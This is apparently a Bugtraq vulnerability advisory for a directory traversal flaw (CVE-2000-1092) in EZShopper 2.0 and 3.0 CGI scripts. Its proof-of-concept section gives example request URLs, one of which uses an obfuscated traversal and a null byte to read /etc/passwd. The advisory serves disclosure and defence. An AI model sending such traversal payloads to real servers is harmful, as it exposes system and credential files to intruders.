Alex Heiphetz Group EZShopper Directory Traversal Vulnerability
BID:2109
Info
| Bugtraq ID: | 2109 |
| Class: | Input Validation Error |
| CVE: | CVE-2000-1092 |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 13 2000 12:00AM |
| Updated: | Jul 11 2009 04:46AM |
| Credit: | Discovered and posted to Bugtraq on Dec 13, 2000 by Nsfocus Security Team <[email protected]>. |
| Vulnerable: | Alex Heiphetz Group EZShopper 3.0; Alex Heiphetz Group EZShopper 2.0 |
| Not Vulnerable: | |
Exploit / POC
Nsfocus Security Team <[email protected]> has provided the following examples:
EZshopper v3.0:
http://www.example.com/cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/
EZshopper v2.0:
http://www.example.com/cgi-bin/ezshopper2/loadpage.cgi?id+/
Zero X <[email protected]> provided the following example:
http://www.example.com/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html
References
- EZShopper Homepage (Alex Heiphetz Group, Inc.)
- EZshopper is still vulnerable against Directory Traversal. (Zero_X www.lobnan.de Team)